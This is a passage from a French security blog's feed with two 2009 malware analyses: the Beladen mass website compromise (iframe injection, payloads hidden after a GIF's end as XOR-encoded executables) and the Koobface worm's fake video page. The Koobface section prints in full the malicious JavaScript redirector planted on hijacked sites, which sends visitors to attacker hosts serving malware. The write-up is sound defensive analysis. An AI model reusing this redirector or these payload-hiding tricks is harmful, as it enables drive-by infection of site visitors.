                <img src="http://mad.internetpol.fr/imgupz/olavash.gif" />Au cours des 3 derniers mois, plus de 2 700 sites légitimes ont été compromis dans le but de relayer des codes malveillants pour principalement infecter les ordinateurs des visiteurs. Des sites du <a href="http://mad.internetpol.fr/exit.php?url_id=602&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Groupe_Bel';return true;" onmouseout="window.status='';return true;" target="_blank" title="Wikipedia: Groupe Bel">groupe Bel</a> ( <em>Kiri, Apéricube, La Vache Qui Rit,...</em> ) n'ont pas échappés à cette triste liste ( ref: <a href="http://mad.internetpol.fr/exit.php?url_id=603&amp;entry_id=46"  onmouseover="window.status='http://www.zataz.com/alerte-virus/19043/kiri--vache-qui-rit--virus--infiltration-pirate.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Zataz.com - kiri.fr ; lamaisondelavachequirit.com ; apericube.fr">zataz</a> ). Les statistiques détaillées en temps réels sont disponibles sur <a title="Google SafeBrowsing" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=604&amp;entry_id=46"  onmouseover="window.status='http://www.google.com/safebrowsing/diagnostic?site=googleanalytlcs.net/';return true;" onmouseout="window.status='';return true;">Google SafeBrowsing</a>...<br /> <p>Les pirates commencent par compromettre un site légitime puis y injectent une balise de type iframe qui sera chargée de rediriger les visiteurs en fonction de leur navigateur ( <a title="Wikipedia: User-Agent" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=605&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/User-Agent';return true;" onmouseout="window.status='';return true;">User-Agent</a> ) ; le fichier javascript &quot;<strong style="color: #f05a0f;">__utmj.js</strong>&quot; sera interprété si et seulement si l'UA correspond à &quot;Internet Explorer&quot;. Ce fichier appel la méthode &quot;document.write&quot; qui va servir à écrire du texte dans la page du site cible. Ce texte correspond à l'écriture d'une nouvelle iframe ( <em>un cadre incorporé</em> ) dont la source est astucieusement générée et pour bien comprendre je vais reprendre l'exemple vulgarisé de Wikipédia: &quot;<em>Quand un utilisateur souhaite accéder à un serveur web, par exemple celui de 3dd4f6.beladen.net, son ordinateur émet une requête spéciale à un serveur DNS, demandant 'Quelle est l'adresse de 3dd4f6.beladen.net ?'. Le serveur répond en retournant l'adresse IP du serveur, qui est dans ce cas-ci, 91.207.61.38.</em>&quot; Ici l'astuce, c'est qu'un jour la source va avoir pour valeur <em>3dd4f6</em>.beladen.net puis le lendemain ça pointera sur localhost (127.0.0.1) et une nouvelle sera créée (ex: <em>160288.</em>beladen.net) - Pour bien comprendre, lisez le fonctionnement des <a title="Wikipedia: Domain Name System" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=606&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Domain_Name_System';return true;" onmouseout="window.status='';return true;">DNS</a>. Si vous avez compris le principe, ça signifie que les &quot;liens&quot; qui seront générés à l'appel de &quot;__utmj.js&quot; vont avoir un cycle de vie. L'url de la nouvelle iframe contient une variable &quot;b&quot; dont la valeur est codifiée, elle va servir de &quot;marqueur&quot; (<em>brand</em>) ; le contenu de la page est encore une iframe dont la source va pointer sur une page dont le nom de page HTML (<em>&quot;m#z#.html&quot;</em>) est généré en partie avec la variable &quot;b&quot;, elle contient les différents exploits qui sont encodés. Si la machine est vulnérable, une requête sera établie sur le fichier distant nommé &quot;ii.php&quot; qui correspond à un programme ( Portable Exécutable ) puis tentera d'ouvrir une fenêtre ( <em>window.open</em> ) sur le fichier distant &quot;go.php&quot; ( <em>absent</em> ) - Les deux premiers serveurs sont basés en Ukraine à <a title="Wikipedia: Zaporojie" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=607&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Zaporojie';return true;" onmouseout="window.status='';return true;">Zaporojie</a>. Pour résumer, voici une schématisation simplifiée:<br /></p> 
<p align="center"><img src="http://mad.internetpol.fr/imgupz/kgguru.gif" /><br /></p> 
<p>Une fois le programme exécuté, il va télécharger le fichier encodé (<em> ?0x45</em> ) nommé &quot;cmd.php&quot; qui est disponible sur plusieurs serveurs: deux aux USA, l'un à <a title="Wikipedia: Portland" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=608&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Portland';return true;" onmouseout="window.status='';return true;">Portland</a> l'autre à <a title="Wikipedia: Brooklyn" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=609&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Brooklyn';return true;" onmouseout="window.status='';return true;">Brooklyn</a> et un en Russie à <a title="Wikipedia: Saint Petersburg" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=610&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Saint_Petersburg';return true;" onmouseout="window.status='';return true;">Saint-Pétersbourg</a>. Ce fichier &quot;<em>attachment; filename=text.dat</em>&quot; contient les ordres qui devront être effectués. Les paramètres de la requête contiennent des informations qui permettent d'alimenter l'interface des pirates ; pour exemple, la variable &quot;cnt&quot; renvoi le code pays. Actuellement, la configuration décodée indique des téléchargements de fichiers sur un serveur basé à <a title="Wikipedia: Singapour" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=611&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Singapour';return true;" onmouseout="window.status='';return true;">Singapour</a> ; Voici un exemple de fichiers qui peuvent être téléchargés:</p> 
<p align="center"><img src="http://mad.internetpol.fr/imgupz/malpics.gif" alt="GifTricks" /> </p> 
<div align="center"> </div> 
<p align="center"><em>attachment; filename=*.gif<br />Content-Type: image/gif</em></p> 
<p><br />
Ne vous fiez pas aux apparences, ces images sont spécialement conçues pour &quot;bypass&quot; certaines mesures - l'astuce est rendue possible grâce au respect du format de fichiers <a href="http://mad.internetpol.fr/exit.php?url_id=612&amp;entry_id=46"  onmouseover="window.status='http://www.w3.org/Graphics/GIF/spec-gif89a.txt';return true;" onmouseout="window.status='';return true;" target="_blank" title="Specification gif89a">gif89a</a>.<br /><br /><font size="3" face="impact" style="color: #5a5a5a;"><sup>27. Trailer. - a. Description. This block is a single-field block indicating the end of the GIF Data Stream. It contains the fixed value 0x3B.</sup></font></p> 
<p align="center"><img src="http://mad.internetpol.fr/imgupz/ent.gif" /> </p> 
<p align="center">A la fin &quot;<em>logique</em>&quot; de l'image se situe un excédent de bytes ; un PE encodé ( ici, <a title="Wikipedia: XOR" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=613&amp;entry_id=46"  onmouseover="window.status='http://fr.wikipedia.org/wiki/OU_exclusif';return true;" onmouseout="window.status='';return true;">XOR</a> 0xEB ).</p> 
<p>Quelques statistiques de ces images une fois <u>décodées</u> :<br />ib[0] - <a href="http://mad.internetpol.fr/exit.php?url_id=614&amp;entry_id=46" title="https://www.virustotal.com/analisis/a1f63d2acc533498797dd958c87d9331"  onmouseover="window.status='https://www.virustotal.com/analisis/a1f63d2acc533498797dd958c87d9331';return true;" onmouseout="window.status='';return true;" target="_blank">2009.05.19 08:45:46 (CET) 3/40 (7.5%)</a> - <a href="http://mad.internetpol.fr/exit.php?url_id=615&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=be202654b9098e78822183db4e688c74"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=be202654b9098e78822183db4e688c74';return true;" onmouseout="window.status='';return true;" target="_blank">be202654b9098e78822183db4e688c74</a><br />ib[1] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=616&amp;entry_id=46" title="https://www.virustotal.com/analisis/e5fd76313ec2ff1ece7e4c53267c91cc"  onmouseover="window.status='https://www.virustotal.com/analisis/e5fd76313ec2ff1ece7e4c53267c91cc';return true;" onmouseout="window.status='';return true;">2009.05.19 16:05:30 (CET) 3/40 (7.5%)</a> - <a href="http://mad.internetpol.fr/exit.php?url_id=617&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=2eaa67cc52f36ce9b91c9b5ee8b05960"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=2eaa67cc52f36ce9b91c9b5ee8b05960';return true;" onmouseout="window.status='';return true;" target="_blank">2eaa67cc52f36ce9b91c9b5ee8b05960</a><br />ib[2] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=618&amp;entry_id=46" title="https://www.virustotal.com/analisis/389ca0781244ff2db5987b507250a3e6"  onmouseover="window.status='https://www.virustotal.com/analisis/389ca0781244ff2db5987b507250a3e6';return true;" onmouseout="window.status='';return true;">2009.05.21 06:44:25 (CET) 4/40 (10%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=619&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=7b181c50edc2ed1afd7cf669b10abedc"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=7b181c50edc2ed1afd7cf669b10abedc';return true;" onmouseout="window.status='';return true;">7b181c50edc2ed1afd7cf669b10abedc</a><br />ib[3] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=620&amp;entry_id=46" title="https://www.virustotal.com/analisis/9042a875bb3c84087368d9f3aa40201d3acbb9c4adcf3a9161164ec89c2a22a3-1242990936"  onmouseover="window.status='https://www.virustotal.com/analisis/9042a875bb3c84087368d9f3aa40201d3acbb9c4adcf3a9161164ec89c2a22a3-1242990936';return true;" onmouseout="window.status='';return true;">2009.05.22 11:15:36 (UTC) 3/40 (7.5%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=621&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=679c58ba56d3c7b752430fedd7bf9699"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=679c58ba56d3c7b752430fedd7bf9699';return true;" onmouseout="window.status='';return true;">679c58ba56d3c7b752430fedd7bf9699</a><br /> ib[4] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=622&amp;entry_id=46" title="https://www.virustotal.com/analisis/ec4e648cf57deedbca59233214a0948ed7fb3cc74eb06d45b7706c4bb108cf23-1243034059"  onmouseover="window.status='https://www.virustotal.com/analisis/ec4e648cf57deedbca59233214a0948ed7fb3cc74eb06d45b7706c4bb108cf23-1243034059';return true;" onmouseout="window.status='';return true;">2009.05.22 23:14:19 (UTC) 3/40 (7.5%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=623&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=c702899c07ea325a2841815cb698481a"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=c702899c07ea325a2841815cb698481a';return true;" onmouseout="window.status='';return true;">c702899c07ea325a2841815cb698481a</a><br /> pr[0] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=624&amp;entry_id=46" title="https://www.virustotal.com/analisis/1def211e3b967d98404f6d4a65a35e97%20"  onmouseover="window.status='https://www.virustotal.com/analisis/1def211e3b967d98404f6d4a65a35e97%20';return true;" onmouseout="window.status='';return true;">2009.05.19 08:44:13 (CET) - 28/40 (70%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=625&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=eacbf9966004520f1f75f7233a8cc33a"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=eacbf9966004520f1f75f7233a8cc33a';return true;" onmouseout="window.status='';return true;">eacbf9966004520f1f75f7233a8cc33a</a><br />xp[0] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=626&amp;entry_id=46" title="https://www.virustotal.com/analisis/6fcce5cabccfa10074a560054e003e94"  onmouseover="window.status='https://www.virustotal.com/analisis/6fcce5cabccfa10074a560054e003e94';return true;" onmouseout="window.status='';return true;">2009.05.19 08:44:20 (CET) - 35/40 (87.5%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=627&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=187295184b2c4ee16c0033bdf9c7d297"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=187295184b2c4ee16c0033bdf9c7d297';return true;" onmouseout="window.status='';return true;">187295184b2c4ee16c0033bdf9c7d297</a><br />xp[1] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=628&amp;entry_id=46" title="https://www.virustotal.com/analisis/a2c64c233d61983391f8827dcebf3919"  onmouseover="window.status='https://www.virustotal.com/analisis/a2c64c233d61983391f8827dcebf3919';return true;" onmouseout="window.status='';return true;">2009.05.19 16:17:11 (CET) - 32/40 (80%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=629&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=f846134ab97a9d7d904bbe7894f0bde4"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=f846134ab97a9d7d904bbe7894f0bde4';return true;" onmouseout="window.status='';return true;">f846134ab97a9d7d904bbe7894f0bde4</a><br />xp[2] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=630&amp;entry_id=46" title="https://www.virustotal.com/analisis/86361122a37eb1c2ea242e34811a9ffc0cf27917d5f360f9390cab4fc3c52714-1243078044"  onmouseover="window.status='https://www.virustotal.com/analisis/86361122a37eb1c2ea242e34811a9ffc0cf27917d5f360f9390cab4fc3c52714-1243078044';return true;" onmouseout="window.status='';return true;">2009.05.23 11:27:24 (UTC) - 3/40 (7.5%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=631&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=2b8a1c524972c2e38fd13c3a101feeaf"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=2b8a1c524972c2e38fd13c3a101feeaf';return true;" onmouseout="window.status='';return true;">2b8a1c524972c2e38fd13c3a101feeaf</a><br />prx[0] - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=632&amp;entry_id=46" title="https://www.virustotal.com/analisis/d20e4531f3255e7a59584583d3df5416"  onmouseover="window.status='https://www.virustotal.com/analisis/d20e4531f3255e7a59584583d3df5416';return true;" onmouseout="window.status='';return true;">2009.05.19 08:44:40 (CET) 22/40 (55%)</a> - <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=633&amp;entry_id=46" title="http://www.threatexpert.com/report.aspx?md5=bbd0bfcc34ed35ebccb233b47c75d4f7"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=bbd0bfcc34ed35ebccb233b47c75d4f7';return true;" onmouseout="window.status='';return true;">bbd0bfcc34ed35ebccb233b47c75d4f7</a></p> 
<p>Pour les intéressés, je vous encourage à compulser le document intitulé &quot;<a title="All Your MP3s Are Belong To Us" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=634&amp;entry_id=46"  onmouseover="window.status='http://www.trustedsource.org/download/research_publications/SCSep08.pdf';return true;" onmouseout="window.status='';return true;">All Your MP3s Are Belong To Us</a>&quot; présenté en septembre 2008 (<a title="Virus Bulletin" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=635&amp;entry_id=46"  onmouseover="window.status='http://www.virusbtn.com/index';return true;" onmouseout="window.status='';return true;">Virus Bulletin</a>) par Christoph Alme, Micha Pekrul, Dennis Elser ; il y a un bon nombre d'éléments qui concordent.<br /></p> Liens connexes:<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=639&amp;entry_id=46"  onmouseover="window.status='http://securitylabs.websense.com/content/Blogs/3408.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="WebSense Security Labs Mass Compromise Beladen">Mass Compromise - Beladen</a> ( June 1st, 2009 - Elad Sharf )<br /> - <a title="20 000 sites hit with drive by attack code" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=640&amp;entry_id=46"  onmouseover="window.status='http://blogs.zdnet.com/security/?p=3476';return true;" onmouseout="window.status='';return true;">20,000 sites hit with drive-by attack code</a> ( June 1st, 2009 - Ryan Naraine )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=641&amp;entry_id=46"  onmouseover="window.status='http://www.scmagazineus.com/Beladen-website-compromises-cropping-up/article/137805/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Beladen website compromises cropping up ; RBN">&quot;Beladen&quot; website compromises cropping up</a> ( June 1st, 2009 - Angela Moscaritolo )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=642&amp;entry_id=46"  onmouseover="window.status='http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Google Online Security - Top 10 Malware Sites">Google Online Security - Top 10 Malware Sites</a> ( June 3, 2009 - Niels Provos )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=677&amp;entry_id=46"  onmouseover="window.status='http://securitylabs.websense.com/content/Alerts/3420.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Websense Labs - Beladen Update: Drastic Decrease in Infected Sites">Beladen Update: Drastic Decrease in Infected Sites</a> ( June 11, 2009 - Websense Security Labs ) 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html" rel="alternate" title="Koobface: La confiance accordée à vos relations doit cesser." />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-05-18T15:24:00Z</published>
        <updated>2009-12-21T22:19:23Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=45</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=45</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/45-guid.html</id>
        <title type="html">Koobface: La confiance accordée à vos relations doit cesser.</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p><div class="bb-code-title"></div><div class="bb-quote"><strong>Win32/Koobface</strong> is <strong>a multi-component family of malware</strong> <u>used to
compromise machines and direct them in various ways at the attacker's
will</u>. This could include using the affected machine to <em>distribute
additional malware</em>,&#160;<em>generate 'pay per click' advertising revenue</em>, <em>steal
sensitive data</em>, <em>break captchas</em>, and&#160;<em>subvert the affected user's online
experience</em>. Its components are varied, but include a worm that spreads
by utilizing <a href="http://mad.internetpol.fr/exit.php?url_id=581&amp;entry_id=45"  onmouseover="window.status='http://en.wikipedia.org/wiki/List_of_social_networking_websites';return true;" onmouseout="window.status='';return true;" target="_blank" title="social networking sites">social networking sites</a>&#160;such as Facebook and MySpace.</div> </p> 
<p>Mai 2009, le ver &quot;<a href="http://mad.internetpol.fr/exit.php?url_id=582&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Koobface';return true;" onmouseout="window.status='';return true;" target="_blank" title="Wikipedia (FR) - Koobface"><em>Koobface</em></a>&quot; anagramme de &quot;<em>FaceBook</em>&quot; arrive dans le <font face="times new roman,times,serif">TOP5</font> des familles derrière Taterf, Frethog et Alureon. Koobface n'est <a href="http://mad.internetpol.fr/exit.php?url_id=583&amp;entry_id=45" title="http://www.kaspersky.com/news?id=207575670"  onmouseover="window.status='http://www.kaspersky.com/news?id=207575670';return true;" onmouseout="window.status='';return true;" target="_blank">pas une nouveauté</a>, certes, mais il est toujours bon de s'informer sur les techniques utilisées et d'avoir conscience des risques potentiels que comportent nos gestes du quotidien ça permet entre autre d'accroître notre vigilance et d'éviter les pièges.</p> 
<p> <img src="http://mad.internetpol.fr/imgupz/mouse_click.jpg" alt="Oh..oh.. you clicked too much!" /></p> 
<blockquote> 
<p><strong>Oh..oh.. you clicked too much!</strong><br /></p> 
</blockquote> <br /> 
<p><img src="http://mad.internetpol.fr/imgupz/ssbdrfb403.gif" /><br /></p> 
<p><u>Scénario</u>: L'utilisateur se connecte à son compte &quot;<em>Facebook</em>&quot;, dans sa boîte de réception, un message accompagné d'un lien inconnu. Un réflexe adopté par cetains internautes consiste à vérifier le nom du site dans Google, ici tout semble normal: la page d'accueil à l'air sérieuse et pourtant.. il s'agit d'un site légitime ayant été détourné pour l'occasion et qui héberge des scripts malveillants, regardez plutôt la suite.<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/6icpmf.jpg" /></p> 
<p>Admettons que l'utilisateur décide de cliquer sur le lien reçu dans sa boîte de réception. Une page va s'afficher, elle aura l'apparence d'une page à l'effigie d'un site dit de confiance: &quot;<em>YouTube</em>.&quot; Une personne informée des risques qui existent sur Internet remarquera rapidement que la barre d'adresse n'affiche pas &quot;<em>youtube.com</em>&quot; et l'anomalie de la fausse page qui a pour titre &quot;<em>YuoTube</em>&quot;. La mise en scène - une fois la page chargée, vous découvrez un message qui vous informe que vous ne disposez pas du nécessaire pour visualiser le contenu, ici la &quot;<em>Secret Video</em>&quot;, et on vous demande explicitement si vous souhaitez accepter ou refuser le téléchargement d'un programme dont le nom vous évoque quelque chose que vous avez déjà lu quelque part, dans ce cas précis: &quot;<em>FlashPlayer</em>&quot;. Si la personne télécharge et exécute ce faux lecteur alors sa machine va être infectée.<br /><br /><img src="http://mad.internetpol.fr/imgupz/kfffp.jpg" /><br /><br />Quand l'utilisateur clique sur le lien qui est contenu dans le message &quot;<em>Facebook</em>&quot;, la page renvoyée se présente sous cette forme: <div class="bb-code-title"></div><div class="bb-quote">let go&lt;script src=w1v9gpe7pm.js&gt;a=b&lt;/script&gt;to cool video</div><br />Le fichier script &quot;<em>w1v9gpe7pm.js</em>&quot; contient:<div class="bb-code-title"></div><div class="bb-quote">var abc1 = 'http://redir0705.com/go/';<br />var abc2 = 'http://redir0805.com/go/';<br />var ss = '' + location.search;<br />if ((location.search).length&gt;0) abc = abc1; else abc = abc2;<br />var redirects = [<br />['facebook.com',&#160; abc+'fb.php'],<br />['tagged.com',&#160;&#160;&#160; abc+'tg.php'],<br />['friendster.com',abc+'fr.php'],<br />['myspace.com',&#160;&#160; abc+'ms.php'],<br />['msplinks.com',&#160; abc+'ms.php'],<br />['myyearbook.com',abc+'yb.php'],<br />['fubar.com',&#160;&#160;&#160;&#160; abc+'fu.php'],<br />['hi5.com',&#160;&#160;&#160;&#160;&#160;&#160; abc+'hi5.php'],<br />['bebo.com',&#160;&#160;&#160;&#160;&#160; abc+'be.php']<br />];<br />var s = '' + document.referrer, r = false;<br />for (var i = 0; i &lt; redirects.length; i ++) {<br />if ((s.indexOf(redirects[i][0]) != -1)) {<br />&#160;&#160;&#160;&#160; var redir=redirects[i][1] + location.search; <br />&#160;&#160;&#160;&#160; if ((location.search).length&gt;0) redir=redir+'&amp;domain='+location.host; else redir=redir+'?domain='+location.host; <br />&#160;&#160;&#160;&#160; location.href = redir; &#160;<br />&#160;&#160;&#160;&#160; r = true; <br />&#160;&#160;&#160;&#160; break; <br />}<br />}<br />if (!r) location.href = abc+'index.php'+ location.search;</div><br />Les valeurs des variables &quot;<em>abc1</em>&quot; et &quot;<em>abc2</em>&quot; du script correspondent à des DNS qui sont tout deux configurés sur le même serveur chez <a href="http://mad.internetpol.fr/exit.php?url_id=584&amp;entry_id=45" title="http://en.wikipedia.org/wiki/TM_Net"  onmouseover="window.status='http://en.wikipedia.org/wiki/TM_Net';return true;" onmouseout="window.status='';return true;" target="_blank" class="bb-url">TM Net</a> situé dans la capitale de la Malaisie, <a title="Wikipedia: Kuala Lumpur" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=585&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Kuala_Lumpur';return true;" onmouseout="window.status='';return true;">Kuala Lumpur</a>. La composition de ces noms de domaines permet de révéler un indicateur temporel quant à la date de mise en service: redir+0705 et redir:0805. Autres exemples observés par le passé, redir+2404.com qui pointe aussi sur ce même serveur par contre redir+2404.com pointe sur un serveur basé à <a title="Wikipedia: Pekin" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=586&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Pekin';return true;" onmouseout="window.status='';return true;">Pékin</a> en Chine. Le navigateur va donc interpréter ce code javascript et en fonction des variables va rediriger vers &quot;<em>redir????.com/go/index.php</em>&quot; ; le serveur va répondre avec pour entête de réponse un champs nommé &quot;<a title="RFC2616 - Location" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=587&amp;entry_id=45"  onmouseover="window.status='http://tools.ietf.org/html/rfc2616#page-135';return true;" onmouseout="window.status='';return true;"><em>Location</em></a>&quot; qui contient l'adresse sur laquelle le navigateur doit être redirigé. A chaque nouvelle requête, un mécanisme (<em>non détaillé</em>) fait en sorte que la valeur renvoyée, en l'occurrence l'adresse IP, soit toujours différente. En principe les éléments qui composent la fausse page &quot;<em>YouTube</em>&quot; sont les mêmes:<br /><br />- &quot;%serveur%/player.swf&quot; ; Une animation Flash qui simule l'absence de Flash. (<em>le comble</em>)<br />- &quot;%serveur%/tom.jpg&quot; ; Un avatar situé en haut à droite sur la capture d'écran.<br />- &quot;%serveur%/setup.exe&quot; ; Un programme malveillant.<br /><br />A chaque nouvelle adresse IP, un programme différent, sûrement dans le but de contourner les <a title="Wikipedia: Antivirus" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=588&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Antivirus';return true;" onmouseout="window.status='';return true;">antivirus</a> qui se baseraient uniquement sur les détections par fichiers de signatures. Différents ? Non, pas vraiment. Seule <a href="http://mad.internetpol.fr/exit.php?url_id=594&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Fonction_de_hachage';return true;" onmouseout="window.status='';return true;" target="_blank" title="Wikipedia: Hachage">l'empreinte</a> change grâce à de faibles variations opérées (<em>non détaillées</em>) par un remplacement de quelques bytes à un offset (<em>position</em>) précis. Ci-dessous, une schématisation: en rouge le nom des réseaux sociaux avec leur <a title="Wikipedia: PageRank" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=590&amp;entry_id=45"  onmouseover="window.status='http://fr.wikipedia.org/wiki/PageRank';return true;" onmouseout="window.status='';return true;">rank</a> entre parenthèses (sources<em>: Alexa</em>) et en jaune la codification utilisée par les scripts / programmes.<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/kfrs.gif" /></p> 
<p>Une fois le programme exécuté, il va indiquer à ses propriétaires qu'il
est opérationnel et va réaliser divers téléchargements qui seront
adaptés en fonction de la configuration de la personne infectée puis veillera à bien tenir à
jour sa panoplie de programmes <em>(1)</em>. A son tour, votre ordinateur va envoyer des messages qui iront peut être infecter d'autres personnes <em>(2)</em>.<br /><br /><img src="http://mad.internetpol.fr/imgupz/kfrs.jpg" /><br />Et on revient au point de départ, c'est cyclique.<br />
Mais que fait <del>la police</del> la bande à <a href="http://mad.internetpol.fr/exit.php?url_id=591&amp;entry_id=45"  onmouseover="window.status='http://blogs.eset-la.com/laboratorio/2008/11/20/campania-alibaba-40-ladrones/';return true;" onmouseout="window.status='';return true;" target="_blank" title="ESET - Campania Ali Baba y 40 ladrones">Ali Baba</a>...<br /></p> 
<p>
Liens connexes:<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=593&amp;entry_id=45"  onmouseover="window.status='http://blogs.technet.com/mmpc/archive/2009/03/10/anti-social-networking.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Anti-Social Networking">Anti-Social Networking</a> ( March 10, 2009 - Scott Molenkamp ; MMPC )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=592&amp;entry_id=45"  onmouseover="window.status='http://digg.com/security/MSRT_and_an_Update_of_Worms_in_the_Wild';return true;" onmouseout="window.status='';return true;" target="_blank" title="MSRT and an Update of Worms in the Wild">MSRT and an Update of Worms in the Wild</a> ( May 4, 2009 - Jeremy Croy ; MMPC )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=599&amp;entry_id=45"  onmouseover="window.status='http://blog.s21sec.com/2009/05/koobface-tirando-del-hilo.html';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface: tirando del hilo">Koobface: tirando del hilo</a> ( May 20, 2009 - Jose Miguel Esparza ; 
S21sec e-crime )<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=600&amp;entry_id=45"  onmouseover="window.status='http://blog.trendmicro.com/koobface-worm-alive-and-wriggling/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Koobface Worm Alive and Wriggling">Koobface Worm Alive and Wriggling</a> ( May 20, 2009 - JM Hipolito ; Trend Micro )<br /> - 
<a href="http://mad.internetpol.fr/exit.php?url_id=638&amp;entry_id=45"  onmouseover="window.status='http://community.ca.com/blogs/securityadvisor/archive/2009/05/31/the-allure-of-social-networking.aspx';return true;" onmouseout="window.status='';return true;" target="_blank" title="Trend Micro - The Allure of Social Networking">The Allure of Social Networking</a> ( May 31, 2009 - Methusela Cebrian Ferrer ; Trend Micro )<br />- <a title="Koobface Re-Activated!" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=670&amp;entry_id=45"  onmouseover="window.status='http://community.ca.com/blogs/securityadvisor/archive/2009/06/16/koobface-re-activated.aspx';return true;" onmouseout="window.status='';return true;">Koobface Re-Activated!</a> ( June 16, 2009 - Ricardo Robielos )<br /> - <a title="Ali Baba and the Forty Thieves - Jerome Segura" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=676&amp;entry_id=45"  onmouseover="window.status='http://blogs.paretologic.com/malwarediaries/index.php/2009/06/19/ali-baba-and-the-forty-thieves/';return true;" onmouseout="window.status='';return true;">Ali Baba and the Forty Thieves</a> ( June 19, 2009 - Jerome Segura )<br />- <a title="Koobface Tweets" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=679&amp;entry_id=45"  onmouseover="window.status='http://blog.trendmicro.com/koobface-tweets/';return true;" onmouseout="window.status='';return true;">Koobface Tweets</a> ( 